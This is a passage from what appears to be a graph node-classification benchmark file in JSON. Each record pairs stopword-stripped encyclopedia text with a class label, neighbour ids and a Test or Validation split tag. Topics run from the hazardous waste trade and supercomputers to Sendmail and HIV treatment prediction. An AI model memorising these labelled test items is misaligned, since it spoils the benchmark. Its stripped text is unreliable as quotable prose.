highly toxic chemicals toxic wastes often disposed open landfills burned incinerators dangerous processes workers wear little protective gear processing toxic chemicals exposed toxins direct contact inhalation contact soil dust well oral intake contaminated locally produced food drinking water health problems resulting hazardous wastes affect humans causing cancers diabetes alterations neurochemical balances hormone disruptions endocrine disruptors skin alterations neurotoxicity kidney damage liver damage bone disease emphysema ovotoxicity reproductive damage many fatal diseases improper disposal hazardous wastes creates fatal health problems serious public health risk various international responses problems associated global waste trade multiple attempts regulate thirty years hazardous waste trade proven difficult regulate much waste traded laws often difficult enforce furthermore often large loopholes international agreements allow countries corporations dump hazardous wastes dangerous ways notable attempt regulate hazardous waste trade basel convention basel convention control transboundary movements hazardous wastes disposal usually known basel convention international treaty plays crucial role regulating transnational movement hazardous wastes basel convention created 1989 attempts regulate hazardous waste trade specifically prevent dumping hazardous waste developed countries less developed countries basel convention developed following series high-profile cases large amounts toxic waste dumped less developed countries poisoning people environment convention seeks reduce creation hazardous wastes control reduce trade across borders convention opened signatures 22 march 1989 officially entered force 5 may 1992 may 2014 180 states european union parties convention haiti united states signed convention ratified environmental network optimizing regulatory compliance illegal traffic enforce agency staffed relevant experts promote compliance basel convention international body created deal transboundary issues international hazardous waste trade issue transnational hazardous waste trade crosses many borders affects many nations important multinational multilateral organization presiding affairs members enforce include one representative five united nations regions parties convention well five representatives basel convention regional coordinating centers based equitable geographical representation members organizations united nations environmental programme unep international criminal police organization interpol ngos working prevent stop illegal traffic basel action network ban many organizations also eligible become members enforce 1999 basel convention passed protocol liability compensation sought improve regulatory measures better protect people hazardous waste protocol liability compensation attempts “ assign appropriate liability procedures transboundary movements hazardous wastes result damages human health environment ” protocol “ imposes strict liability damages situations involving parties basel convention maintain control hazardous waste respective notifying transporting disposing entities. ” seeks regulate ensure countries ’ corporations ’ compliance basel convention laws however protocol remains unsigned countries applicability limited effort protect unfair hazardous waste dumping african caribbean pacific states acp signed lome iv convention supplement basel convention prohibits “ export hazardous wastes european community acp states. ” convention one attempt developing countries protect western countries exporting waste poorer nations hazardous waste trade lomé iv convention expired 2000 acp countries european countries entered new agreement known cotonou agreement “ recognizes existence disproportionate risks developing countries desires protect inappropriate hazardous waste shipments countries. ” 1991 multiple developing nations africa met discuss dissatisfaction basel convention regulating dumping hazardous waste countries designed ban import hazardous wastes countries called bamako convention bamako convention different basel convention bamako “ essentially bans import hazardous waste generated outside oau organization african unity disposal recycling deems import non-party illegal act. ” however countries could effectively implement stipulations convention could prevent dump toxic wastes due limited resources lack powerful enforcement therefore application bamako convention limited laura pratt expert hazardous waste trade claims despite local international attempts regulate hazardous waste trade “ current international agreements widespread legally binding agreements ad hoc agendas among smaller groups countries successful eliminating toxic waste colonialism proponents would hoped. ” explains various loopholes current system allow toxic waste continue dumped toxic colonialism go unchecked problems international agreements include continued illegal shipments unclear definitions terms pratt explains despite attempts regulate illegal dumping “ ftentimes hazardous waste simply moved false permits bribes improper labels even pretext 'recycling growing trend. ” companies often export hazardous wastes poorer countries illegal smuggling attempts regulate market hindered lack ability monitor trade many countries authoritative legislative bodies place prevent punish illegal trafficking hazardous wastes furthermore pratt explains without coordinated international methods enforce regulations extremely difficult countries control illegal trade hazardous waste due disparity enforcement resources regulation uniformity. ” developing nations still bear brunt illegal activity often resources capability protect another issue basel convention international agreements regulate waste trade difficulty establishing clear uniform definitions regarding wastes overly broad ambiguous definitions cause problems international agreements different parties interpret language agreements differently thus act accordingly example “ ‘ lack distinction ‘ waste ’ ‘ products ’ convention vague criteria ‘ hazardous ’ allowed continued export 'hazardous waste ’ label commodities raw materials despite fact wastes still present environmental health risks developing countries ”",
    "neighbors": [
      6658,
      11534,
      9499,
      3666,
      2867,
      7579,
      1500
    ],
    "mask": "Test"
  },
  {
    "node_id": 1478,
    "label": 5,
    "text": "Asynchronous_serial_communication:asynchronous serial communication asynchronous serial communication form serial communication communicating endpoints interfaces continuously synchronized common clock signal instead common synchronization signal data stream contains synchronization information form start stop signals unit transmission respectively start signal prepares receiver arrival data stop signal resets state enable triggering new sequence common kind start-stop transmission ascii rs-232 example use teletypewriter operation mechanical teleprinters using 5-bit codes see baudot code typically used stop period 1.5 bit times early electromechanical teletypewriters pre-1930 could require 2 stop bits allow mechanical impression without buffering hardware support fractional stop bits communicate device uses 1.5 bit times configured send 2 stop bits transmitting requiring 1 stop bit receiving format derived directly design teletypewriter designed way electromechanical technology day precise enough synchronous operation thus systems needed re-synchronized start character re-synchronized technology day good enough preserve bit-sync remainder character stop bits gave system time recover next start bit early teleprinter systems used five data bits typically variant baudot code early experimental printing telegraph devices used start bit required manual adjustment receiver mechanism speed reliably decode characters automatic synchronization required keep transmitting receiving units step finally achieved howard krum patented start-stop method synchronization granted september 19 1916 granted december 3 1918 shortly afterward practical teleprinter patented granted july 3 1917 signalling work sender receiver must agree signalling parameters asynchronous start-stop signalling widely used dial-up modem access time-sharing computers bbs systems systems used either seven eight data bits transmitted least-significant bit first accordance ascii standard computers common configuration used 8n1 eight bit characters one start bit one stop bit parity bit thus 10 baud times used send single character dividing signalling bit-rate ten results overall transmission speed characters per second asynchronous start-stop lower data-link layer used connect computers modems many dial-up internet access applications using second encapsulating data link framing protocol ppp create packets made asynchronous serial characters common physical layer interface used rs-232d performance loss relative synchronous access negligible modern modems use private synchronous protocol send data asynchronous links end operated faster data link flow control used throttle data rate prevent overrun",
    "neighbors": [
      2912,
      1121,
      10947,
      8388,
      11075,
      11395,
      1997,
      10094,
      8432,
      10833,
      2994,
      4918,
      10072,
      7865,
      4543
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1479,
    "label": 4,
    "text": "Risk_factor_(computing):risk factor computing information security risk factor collective name circumstances affecting likelihood impact security risk factor analysis information risk fair devoted analysis different factors influencing risk decompose various levels starting first level loss event frequency probable loss magnitude going examining asset threat agent capability compared vulnerability computing security control also called countermeasure strength probability agent get contact actually act asset organization capability react event impact stakeholders risk factors factors influence frequency and/or business impact risk scenarios different natures classified two major categories risk risk scenario description related event lead business impact occur risk factors also interpreted causal factors scenario materialising vulnerabilities weaknesses terms often used risk management frameworks risk scenario characterized risk scenario structure differentiates loss events events generating negative impact vulnerabilities vulnerability events events contributing magnitude frequency loss events occurring threat events circumstances events trigger loss events important confuse risks throw one large risk list",
    "neighbors": [
      3552,
      10717,
      612,
      5636,
      11594,
      2190,
      5774,
      8975,
      4689,
      8881,
      11567,
      1369,
      5373,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 1480,
    "label": 7,
    "text": "Supercomputer:supercomputer supercomputer computer high level performance compared general-purpose computer performance supercomputer commonly measured floating-point operations per second flops instead million instructions per second mips since 2017 supercomputers perform hundred quadrillion flops since november 2017 world fastest 500 supercomputers run linux-based operating systems additional research conducted china united states european union taiwan japan build even faster powerful technologically superior exascale supercomputers supercomputers play important role field computational science used wide range computationally intensive tasks various fields including quantum mechanics weather forecasting climate research oil gas exploration molecular modeling computing structures properties chemical compounds biological macromolecules polymers crystals physical simulations simulations early moments universe airplane spacecraft aerodynamics detonation nuclear weapons nuclear fusion throughout history essential field cryptanalysis supercomputers introduced 1960s several decades fastest made seymour cray control data corporation cdc cray research subsequent companies bearing name monogram first machines highly tuned conventional designs ran faster general-purpose contemporaries 1960s began add increasing amounts parallelism one four processors typical 1970s vector processors operating large arrays data came dominate notable example highly successful cray-1 1976 vector computers remained dominant design 1990s today massively parallel supercomputers tens thousands off-the-shelf processors became norm us long leader supercomputer field first cray almost uninterrupted dominance field later variety technology companies japan made major strides field 1980s 90s since china become increasingly active field november 2018 fastest supercomputer top500 supercomputer list summit united states linpack benchmark score 143.5 pflops followed sierra around 48.860 pflops us five top 10 china two june 2018 supercomputers list combined broken 1 exaflops mark 1960 sperry rand built livermore atomic research computer larc today considered among first supercomputers us navy research development centre still used high-speed drum memory rather newly emerging disk drive technology also among first supercomputers ibm 7030 stretch ibm 7030 built ibm los alamos national laboratory 1955 requested computer 100 times faster existing computer ibm 7030 used transistors magnetic core memory pipelined instructions prefetched data memory controller included pioneering random access disk drives ibm 7030 completed 1961 despite meeting challenge hundredfold increase performance purchased los alamos national laboratory customers england france also bought computer became basis ibm 7950 harvest supercomputer built cryptanalysis third pioneering supercomputer project early 1960s atlas university manchester built team led tom kilburn designed atlas memory space million words 48 bits magnetic storage capacity unaffordable actual core memory atlas 16,000 words drum providing memory 96,000 words atlas operating system swapped data form pages magnetic core drum atlas operating system also introduced time-sharing supercomputing one programe could executed supercomputer one time atlas joint venture ferranti manchester university designed operate processing speeds approaching one microsecond per instruction one million instructions per second cdc 6600 designed seymour cray finished 1964 marked transition germanium silicon transistors silicon transistors could run faster overheating problem solved introducing refrigeration supercomputer design thus cdc6600 became fastest computer world given 6600 outperformed contemporary computers 10 times dubbed supercomputer defined supercomputing market one hundred computers sold 8 million cray left cdc 1972 form company cray research four years leaving cdc cray delivered 80 mhz cray-1 1976 became one successful supercomputers history cray-2 released 1985 eight central processing units cpus liquid cooling electronics coolant liquid fluorinert pumped supercomputer architecture performed 1.9 gigaflops world second fastest m-13 supercomputer moscow computer seriously challenge cray-1 performance 1970s illiac iv machine first realized example true massively parallel computer many processors worked together solve different parts single larger problem contrast vector systems designed run single stream data quickly possible concept computer instead feeds separate parts data entirely different processors recombines results illiac design finalized 1966 256 processors offer speed 1 gflops compared 1970s cray-1 peak 250 mflops however development problems led 64 processors built system could never operate faster 200 mflops much larger complex cray another problem writing software system difficult getting peak performance matter serious effort partial success illiac iv widely seen pointing way future supercomputing cray argued famously quipping plowing field would rather use two strong oxen 1024 chickens early 1980s several teams working parallel designs thousands processors notably connection machine cm developed research mit cm-1 used many 65,536 simplified custom microprocessors connected together network share data several updated versions followed cm-5 supercomputer massively parallel processing computer capable many billions arithmetic operations per second 1982 osaka university links-1 computer graphics system used massively parallel processing architecture 514 microprocessors including 257 zilog z8001 control processors 257 iapx 86/20 floating-point processors mainly used rendering realistic 3d computer graphics fujitsu numerical wind tunnel supercomputer used 166 vector processors gain top spot 1994 peak speed 1.7 gigaflops gflops per processor hitachi sr2201 obtained peak performance 600 gflops 1996 using 2048 processors connected via fast three-dimensional crossbar network intel paragon could 1000 4000 intel i860 processors various configurations ranked fastest world 1993 paragon mimd machine connected processors via high speed two dimensional mesh allowing processes execute separate nodes communicating via message passing interface software development remained problem cm series sparked considerable research issue similar designs using custom hardware made many companies including evans sutherland es-1 maspar ncube intel ipsc goodyear mpp mid-1990s general-purpose cpu performance improved much supercomputer could built using individual processing units instead using custom chips turn 21st century designs featuring tens thousands commodity cpus norm later machines adding graphic units mix systems massive number processors generally take one two paths grid computing approach processing power many computers organised distributed diverse administrative domains opportunistically used whenever computer available another approach large number processors used proximity e.g computer cluster centralized massively parallel system speed flexibility becomes important modern supercomputers used various approaches ranging enhanced infiniband systems three-dimensional torus interconnects use multi-core processors combined centralization emerging direction e.g cyclops64 system price performance energy efficiency general purpose graphic processors gpgpus improved number petaflops supercomputers tianhe-i nebulae started rely however systems k computer continue use conventional processors sparc-based designs overall applicability gpgpus general-purpose high-performance computing applications subject debate gpgpu may tuned score well specific benchmarks overall applicability everyday algorithms may limited unless significant effort spent tune application towards however gpus gaining ground 2012 jaguar supercomputer transformed titan retrofitting cpus gpus high-performance computers expected life cycle three years requiring upgrade number special-purpose systems designed dedicated single problem allows use specially programmed fpga chips even custom asics allowing better price/performance ratios sacrificing generality examples special-purpose supercomputers include belle deep blue hydra playing chess gravity pipe astrophysics mdgrape-3 protein structure computation molecular dynamics deep crack breaking des cipher throughout decades management heat density remained key issue centralized supercomputers large amount heat generated system may also effects e.g reducing lifetime system components diverse approaches heat management pumping fluorinert system hybrid liquid-air cooling system air cooling normal air conditioning temperatures typical supercomputer consumes large amounts electrical power almost converted heat requiring cooling example tianhe-1a consumes 4.04 megawatts mw electricity cost power cool system significant e.g 4 mw 0.10/kwh 400 hour 3.5 million per year heat management major issue complex electronic devices affects powerful computer systems various ways thermal design power cpu power dissipation issues supercomputing surpass traditional computer cooling technologies supercomputing awards green computing reflect issue packing thousands processors together inevitably generates significant amounts heat density need dealt cray 2 liquid cooled used fluorinert cooling waterfall forced modules pressure however submerged liquid cooling approach practical multi-cabinet systems based off-the-shelf processors system x special cooling system combined air conditioning liquid cooling developed conjunction liebert company blue gene system ibm deliberately used low power processors deal heat density ibm power 775 released 2011 closely packed elements require water cooling ibm aquasar system uses hot water cooling achieve energy efficiency water used heat buildings well energy efficiency computer systems generally measured terms flops per watt 2008 ibm roadrunner operated 3.76 mflops/w november 2010 blue gene/q reached 1,684 mflops/w june 2011 top 2 spots green 500 list occupied blue gene machines new york one achieving 2097 mflops/w degima cluster nagasaki placing third 1375 mflops/w copper wires transfer energy supercomputer much higher power densities forced air circulating refrigerants remove waste heat ability cooling systems remove waste heat limiting factor many existing supercomputers infrastructure capacity actual peak demand machine designers generally conservatively design power cooling infrastructure handle theoretical peak electrical power consumed supercomputer designs future supercomputers power-limited thermal design power supercomputer whole amount power cooling infrastructure handle somewhat expected normal power consumption less theoretical peak power consumption electronic hardware since end 20th century supercomputer operating systems undergone major transformations based changes supercomputer architecture early operating systems custom tailored supercomputer gain speed trend move away in-house operating systems adaptation generic software linux since modern massively parallel supercomputers typically separate computations services using multiple types nodes usually run different operating systems different nodes e.g using small efficient lightweight kernel cnk cnl compute nodes larger system linux-derivative server i/o nodes traditional multi-user computer system job scheduling effect tasking problem processing peripheral resources massively parallel system job management system needs manage allocation computational communication resources well gracefully deal inevitable hardware failures tens thousands processors present although modern supercomputers use linux-based operating system manufacturer specific linux-derivative industry standard exists partly due fact differences hardware architectures require changes optimize operating system hardware design parallel architectures supercomputers often dictate use special programming techniques exploit speed software tools distributed processing include standard apis mpi pvm vtl open source-based software solutions beowulf common scenario environments pvm mpi loosely connected clusters openmp tightly coordinated shared memory machines used significant effort required optimize algorithm interconnect characteristics machine run aim prevent cpus wasting time waiting data nodes gpgpus hundreds processor cores programmed using programming models cuda opencl moreover quite difficult debug test parallel programs special techniques need used testing debugging applications opportunistic supercomputing form networked grid computing whereby super virtual computer many loosely coupled volunteer computing machines performs large computing tasks grid computing applied number large-scale embarrassingly parallel problems require supercomputing performance scales however basic grid cloud computing approaches rely volunteer computing handle traditional supercomputing tasks fluid dynamic simulations fastest grid computing system distributed computing project folding home f h f h reported 101 pflops x86 processing power 100 pflops contributed clients running various gpus rest various cpu systems berkeley open infrastructure network computing boinc platform hosts number distributed computing projects boinc recorded processing power 166 petaflops 762 thousand active computers hosts network great internet mersenne prime search gimps distributed mersenne prime search achieved 0.313 pflops 1.3 million computers internet primenet server supports gimps grid computing approach one earliest successful grid computing projects since 1997 quasi-opportunistic supercomputing form distributed computing whereby super virtual computer many networked geographically disperse computers performs computing tasks demand huge processing power quasi-opportunistic supercomputing aims provide higher quality service opportunistic grid computing achieving control assignment tasks distributed resources use intelligence availability reliability individual systems within supercomputing network however quasi-opportunistic distributed execution demanding parallel computing software grids achieved implementation grid-wise allocation agreements co-allocation subsystems communication topology-aware allocation mechanisms fault tolerant message passing libraries data pre-conditioning cloud computing recent rapid expansions development grabbed attention hpc users developers recent years cloud computing attempts provide hpc-as-a-service exactly like forms services currently available cloud software-as-a-service platform-as-a-service infrastructure-as-a-service hpc users may benefit cloud different angles scalability resources on-demand fast inexpensive hand moving hpc applications set challenges good examples challenges virtualization overhead cloud multi-tenancy resources network latency issues much research currently done overcome challenges make hpc cloud realistic possibility 2016 penguin computing r-hpc amazon web services univa silicon graphics international sabalcore gomput started offer hpc cloud computing penguin demand pod cloud bare-metal compute model execute code user given virtualized login node pod computing nodes connected via nonvirtualized 10 gbit/s ethernet qdr infiniband networks user connectivity pod data center ranges 50 mbit/s 1 gbit/s citing amazon ec2 elastic compute cloud penguin computing argues virtualization compute nodes suitable hpc penguin computing also criticized hpc clouds may allocated computing nodes customers far apart causing latency impairs performance hpc applications supercomputers generally aim maximum capability computing rather capacity computing capability computing typically thought using maximum computing power solve single large problem shortest amount time often capability system able solve problem size complexity computer e.g. complex weather simulation application capacity computing contrast typically thought using efficient cost-effective computing power solve somewhat large problems many small problems architectures lend supporting many users routine everyday tasks may lot capacity typically considered supercomputers given solve single complex problem general speed supercomputers measured benchmarked flops floating point operations per second terms mips million instructions per second case general-purpose computers measurements commonly used si prefix tera- combined shorthand tflops 10 flops pronounced teraflops peta- combined shorthand pflops 10 flops pronounced petaflops petascale supercomputers process one quadrillion 10 1000 trillion flops exascale computing performance exaflops eflops range eflops one quintillion 10 flops one million tflops single number reflect overall performance computer system yet goal linpack benchmark approximate fast computer solves numerical problems widely used industry flops measurement either quoted based theoretical floating point performance processor derived manufacturer processor specifications shown rpeak top500 lists generally unachievable running real workloads achievable throughput derived linpack benchmarks shown rmax top500 list linpack benchmark typically performs lu decomposition large matrix linpack performance gives indication performance real-world problems necessarily match processing requirements many supercomputer workloads example may require memory bandwidth may require better integer computing performance may need high performance i/o system achieve high levels performance since 1993 fastest supercomputers ranked top500 list according linpack benchmark results list claim unbiased definitive widely cited current definition fastest supercomputer available given time recent list computers appeared top top500 list peak speed given rmax rating source top500 2018 lenovo became worlds largest provider 117 top500 supercomputers stages supercomputer application may summarized following table ibm blue gene/p computer used simulate number artificial neurons equivalent approximately one percent human cerebral cortex containing 1.6 billion neurons approximately 9 trillion connections research group also succeeded using supercomputer simulate number artificial neurons equivalent entirety rat brain modern-day weather forecasting also relies supercomputers national oceanic atmospheric administration uses supercomputers crunch hundreds millions observations help make weather forecasts accurate 2011 challenges difficulties pushing envelope supercomputing underscored ibm abandonment blue waters petascale project advanced simulation computing program currently uses supercomputers maintain simulate united states nuclear stockpile 2010s china united states european union others competed first create 1 exaflop 10 one quintillion flops supercomputer erik p. debenedictis sandia national laboratories theorized zettaflops 10 one sextillion flops computer required accomplish full weather modeling could cover two-week time span accurately systems might built around 2030 many monte carlo simulations use algorithm process randomly generated data set particularly integro-differential equations describing physical transport processes random paths collisions energy momentum depositions neutrons photons ions electrons etc next step microprocessors may third dimension specializing monte carlo many layers could identical simplifying design manufacture process cost operating high performance supercomputers risen mainly due increasing power consumption mid 1990s top 10 supercomputer required range 100 kilowatt 2010 top 10 supercomputers required 1 2 megawatt 2010 study commissioned darpa identified power consumption pervasive challenge achieving exascale computing time megawatt per year energy consumption cost 1 million dollar supercomputing facilities constructed efficiently remove increasing amount heat produced modern multi-core central processing units based energy consumption green 500 list supercomputers 2007 2011 supercomputer 1 exaflops 2011 would required nearly 500 megawatt operating systems developed existing hardware conserve energy whenever possible cpu cores use execution parallelised application put low-power states producing energy savings supercomputing applications increasing cost operating supercomputers driving factor trend towards bundling resources distributed supercomputer infrastructure national supercomputing centres first emerged us followed germany japan european union launched partnership advanced computing europe prace aim creating persistent pan-european supercomputer infrastructure services support scientists across european union porting scaling optimizing supercomputing applications iceland built world first zero-emission supercomputer located thor data center reykjavik iceland supercomputer relies completely renewable sources power rather fossil fuels colder climate also reduces need active cooling making one greenest facilities world computers funding supercomputer hardware also became increasingly difficult mid 1990s top 10 supercomputer cost 10 million euros 2010 top 10 supercomputers required investment 40 50 million euros 2000s national governments put place different strategies fund supercomputers uk national government funded supercomputers entirely high performance computing put control national funding agency germany developed mixed funding model pooling local state funding federal funding many science-fiction writers depicted supercomputers works historical construction computers much fiction deals relations humans computers build possibility conflict eventually developing scenarios nature appear ai-takeover page examples supercomputers fiction include hal-9000 multivac machine stops glados evitable conflict vulcan hammer",
    "neighbors": [
      7169,
      3586,
      4098,
      7682,
      1029,
      9731,
      1031,
      8711,
      9224,
      3083,
      9742,
      10768,
      7699,
      6677,
      11290,
      4124,
      10780,
      6179,
      10789,
      6184,
      5677,
      9774,
      10288,
      5681,
      7218,
      8242,
      1083,
      2623,
      2113,
      7234,
      8262,
      9801,
      1613,
      7248,
      597,
      10327,
      1115,
      2140,
      3677,
      4194,
      11363,
      7780,
      5223,
      6247,
      6250,
      2155,
      6252,
      4205,
      6253,
      8810,
      6256,
      5233,
      2162,
      5237,
      6774,
      3191,
      119,
      631,
      7802,
      9333,
      9851,
      3197,
      5245,
      9343,
      9345,
      2179,
      3204,
      4743,
      8327,
      5258,
      4235,
      5774,
      1168,
      7313,
      2710,
      8349,
      10909,
      6815,
      8863,
      2210,
      8355,
      1702,
      5798,
      1707,
      10411,
      4269,
      4270,
      3247,
      2224,
      9391,
      6322,
      4276,
      2236,
      4286,
      6338,
      8900,
      10436,
      9926,
      6856,
      6858,
      9932,
      7887,
      5840,
      11474,
      4308,
      3285,
      2264,
      731,
      11485,
      11487,
      1761,
      9955,
      8937,
      5355,
      5356,
      9964,
      4334,
      5358,
      1776,
      5872,
      10483,
      2804,
      2294,
      760,
      3323,
      5373,
      6909,
      2303,
      3328,
      8447,
      11517,
      9991,
      4360,
      1801,
      5384,
      7432,
      783,
      785,
      1809,
      2834,
      11027,
      6421,
      7963,
      5404,
      1309,
      1823,
      8481,
      2850,
      8994,
      2345,
      3882,
      4909,
      3886,
      7983,
      8501,
      823,
      2871,
      5948,
      8514,
      10051,
      5956,
      11075,
      3911,
      4423,
      7497,
      330,
      1866,
      8007,
      4429,
      5965,
      2895,
      8523,
      2901,
      341,
      344,
      2394,
      5471,
      11618,
      11626,
      8044,
      7022,
      4463,
      3446,
      2935,
      1400,
      1399,
      3960,
      3451,
      6006,
      11129,
      11130,
      9602,
      3978,
      1933,
      398,
      10641,
      8082,
      5523,
      1941,
      5015,
      9630,
      7072,
      10658,
      9126,
      6057,
      426,
      938,
      939,
      9132,
      4014,
      4017,
      9137,
      2995,
      10675,
      1461,
      8122,
      7104,
      1985,
      9665,
      11205,
      7111,
      3537,
      5585,
      467,
      2008,
      9688,
      6618,
      10200,
      1503,
      5090,
      1510,
      7142,
      2536,
      4074,
      4587,
      7148,
      3055,
      4079,
      10223,
      9714,
      499,
      8179,
      7670,
      508,
      2045,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 1481,
    "label": 8,
    "text": "OWL-S:owl-s owl-s ontology built top web ontology language owl darpa daml program replaces former daml-s ontology owl-s ontology within owl-based framework semantic web describing semantic web services enable users software agents automatically discover invoke compose monitor web resources offering services specified constraints development owl-s aims enable following tasks owl-s ontology three main parts service profile process model grounding owl-s requires additional description full specification grounding commonly used wsdl although languages target different levels specification intersection",
    "neighbors": [
      10020,
      8070,
      5449,
      9514,
      7408,
      10452,
      3000
    ],
    "mask": "Test"
  },
  {
    "node_id": 1482,
    "label": 2,
    "text": "IPad_Mini_(2019):ipad mini 2019 fifth-generation ipad mini stylized marketed ipad mini colloquially referred ipad mini 5 tablet computer ipad mini line designed developed marketed apple inc announced press release along ipad air 2019 march 18 2019 first ipad mini released without live press event predecessor ipad mini 4 discontinued day shares similar design ipad mini 4 features apple a12 bionic chip 64 256gb storage modernly upgraded 7.9-inch retina display support apple pencil 1st generation true tone display bluetooth 5.0. ifixit teardown shows ipad mini equipped upgraded 3gb lpddr4x ram iphone xr ipad mini 2019 features upgraded front camera system 7mp 1080p camera used since 2016 starting iphone 7 continued iphone xs rear camera system continues older 8mp 1080p used since ipad air 2 2014 record 4k ipad mini uses lightning port headphone jack true tone display allows lcd adapt ambient lighting change color intensity different environments apple a12 bionic chip powering ipad mini 2019 66 higher clock speed predecessor 1.5ghz dual-core processor apple a8 previous generation clocked higher iphone 6 apple a12 bionic chip 2.49ghz six-core processor ipad mini 2019 3x faster ipad mini 4 support apple pencil 1st generation",
    "neighbors": [
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      6186,
      4139,
      6700,
      7211,
      1074,
      8754,
      9784,
      8253,
      576,
      1090,
      8783,
      4180,
      10838,
      1623,
      3672,
      10840,
      9312,
      3681,
      9826,
      8806,
      3691,
      2673,
      6258,
      10357,
      6264,
      4220,
      7292,
      2686,
      6783,
      7806,
      10365,
      10878,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      5784,
      1177,
      4251,
      3228,
      2207,
      4258,
      7842,
      7844,
      11430,
      171,
      2735,
      3248,
      4283,
      3772,
      7869,
      8893,
      8896,
      6654,
      4807,
      4810,
      3790,
      1744,
      3286,
      9430,
      3293,
      4318,
      9952,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      1776,
      10481,
      7420,
      1290,
      3338,
      781,
      4879,
      784,
      9999,
      10512,
      4888,
      5912,
      8480,
      10023,
      4910,
      4399,
      7983,
      7991,
      11066,
      2363,
      2365,
      2366,
      9022,
      11257,
      1346,
      10562,
      838,
      7496,
      8525,
      2388,
      8534,
      3928,
      8540,
      4957,
      6495,
      8544,
      9063,
      10602,
      3948,
      11629,
      10608,
      9084,
      7549,
      11649,
      2439,
      6023,
      3977,
      6539,
      7052,
      1428,
      3483,
      2979,
      9123,
      11173,
      8109,
      2492,
      446,
      7614,
      5058,
      10691,
      2502,
      456,
      7118,
      464,
      6608,
      8662,
      9174,
      10199,
      8665,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      8170,
      5616,
      6130,
      7154,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 1483,
    "label": 2,
    "text": "Cyclic_executive:cyclic executive cyclic executive alternative real-time operating system form cooperative multitasking one task sole task typically realized infinite loop main e.g c. basic scheme cycle repeating sequence activities set frequency example consider example embedded system designed monitor temperature sensor update lcd display lcd may need written twenty times second i.e. every 50 ms temperature sensor must read every 100 ms reasons might construct loop following appearance outer 100 ms cycle called major cycle case also inner minor cycle 50 ms first example outer versus inner cycles n't obvious use counting mechanism clarify major minor cycles",
    "neighbors": [
      3197,
      9366
    ],
    "mask": "Test"
  },
  {
    "node_id": 1484,
    "label": 4,
    "text": "Sendmail,_Inc.:sendmail inc. sendmail inc. email management business company headquartered emeryville ca offices throughout americas europe asia company founded 1998 eric allman creator sendmail open source mail transfer agent 2005 sendmail released sentrion email infrastructure platform address need full-content message inspection enabling policy-based delivery human machine-generated email 2012 sendmail partnered mimecast provide hybrid-cloud email security archiving continuity predicted 2013 would see organizations implementing hybrid cloud computing strategies reduce cost complexity messaging infrastructure 2012 sendmail released sentrion reac rogue email application control amid growing security compliance concerns posed growth application-generated email migration email cloud 2013 sendmail acquired security-as-a-service company proofpoint inc",
    "neighbors": [
      472,
      8061
    ],
    "mask": "Test"
  },
  {
    "node_id": 1485,
    "label": 2,
    "text": "Qimo_4_Kids:qimo 4 kids qimo 4 kids pronounced kim-oh eskimo child-friendly desktop environment built entirely free software qimo comes pre-installed educational games kids tuxpaint etoys gcompris tuxmath tuxtyping large colorful icons help young users navigate easily designed early elementary school aged children qimo based xubuntu using xfce designed visually appealing kids fact qimo based xubuntu helps provide low hardware requirements minimum 256mb memory run cd 192mb install least 6 gb hard drive space 400 mhz faster cpu needed qimo uses ubuntu 10.04 lts lucid lynx still possible download run qimo 2.0 project discontinued development halted 30 january 2016 may 2010 qimo 2.0 released",
    "neighbors": [
      8177,
      6371,
      5397
    ],
    "mask": "Test"
  },
  {
    "node_id": 1486,
    "label": 1,
    "text": "Resistance_Database_Initiative:resistance database initiative hiv resistance response database initiative rdi not-for-profit organisation established 2002 following mission improve clinical management hiv infection developing large clinical database bioinformatic techniques predict accurately individual response combination hiv drugs rdi following specific goals rdi consists small executive group based uk international advisory group leading hiv/aids scientists clinicians extensive global network collaborators data contributors human immunodeficiency virus hiv virus causes acquired immunodeficiency syndrome aids condition immune system begins fail leading life-threatening opportunistic infections approximately 25 hiv ‘ antiretroviral ’ drugs approved treatment hiv infection six different classes based point hiv life-cycle act used combination typically 3 drugs 2 different classes form therapy known highly active antiretroviral therapy haart aim therapy suppression virus low ideally undetectable levels blood prevents virus depleting immune cells preferentially attacks cd4 cells prevents delays illness death despite expanding availability drugs impact use treatments continue fail often involving development resistance drug therapy low-level virus replication still occurs particularly patient misses dose hiv makes errors copying genetic material mutation makes virus resistant one drugs may begin replicate successfully presence drug undermine effect treatment happens treatment needs changed re-establish control virus well-resourced healthcare settings treatment fails resistance test may run predict drugs patient virus resistant type test common use genotype test detects mutations viral genetic code information typically interpreted using rules equating individual mutations resistance individual drugs however many different interpretation systems available always agree systems provide categorical results resistant sensitive intermediate necessarily relate well patient respond combination drugs clinic rdi established 2002 pioneer new approach develop computational models using wide range laboratory clinical data collected thousands patients treated haart world use models predict individual patient respond different combinations drugs key success approach collection large amounts data train models use data wide heterogeneous range sources possible maximise generalisability models ’ predictions order achieve rdi set involve many clinics worldwide possible single repository data required attempt avoid unnecessary duplication effort competition january 2019 rdi collected data approximately 250,000 patients dozens clinics 30 countries probably largest database kind world data includes demographic information patient multiple determinations amount virus patient bloodstream cd4 cells counts white blood cell critical function immune system hiv targets destroys genetic code patients virus details drugs used treat patient rdi used data conduct extensive research order develop accurate system possible prediction treatment response research involved development comparison different computational modelling methods including artificial neural networks support vector machines random forests logistical regression predictions rdi models historically correlated well actual changes virus load patients clinic typically achieving correlation co-efficient 0.7 recent models predicted whether combination treatment reduce level virus patient bloodstream undetectable levels accuracy approximately 80 significantly better using genotype rules-based interpretation october 2010 following clinical testing two multinational studies rdi made experimental hiv treatment response prediction system hiv-treps available internet january 2011 two clinical studies published indicating use hiv-treps system could lead clinical economic benefits studies conducted expert hiv physicians us canada italy showed use system associated changes treatment decision combinations involving fewer drugs overall predicted result better virological responses suggesting use system could potentially improve patient outcomes reduce overall number cost drugs used clinics resource-limited settings often unable afford genotyping rdi developed models predict treatment response without need genotype small loss accuracy july 2011 rdi made models available part hiv-treps system version aimed particularly resource-limited settings genotyping often routinely available recent models trained largest dataset far achieved 80 accuracy comparable models use genotype predictions significantly accurate genotyping rules-based interpretation hiv-treps use approximately 90 countries tool predict virological response therapy avoid treatment failure system expanded enable physicians include local drug costs modelling recent study data indian cohort demonstrated system able identify combinations three locally available drugs higher probability success regimen prescribed clinic including cases 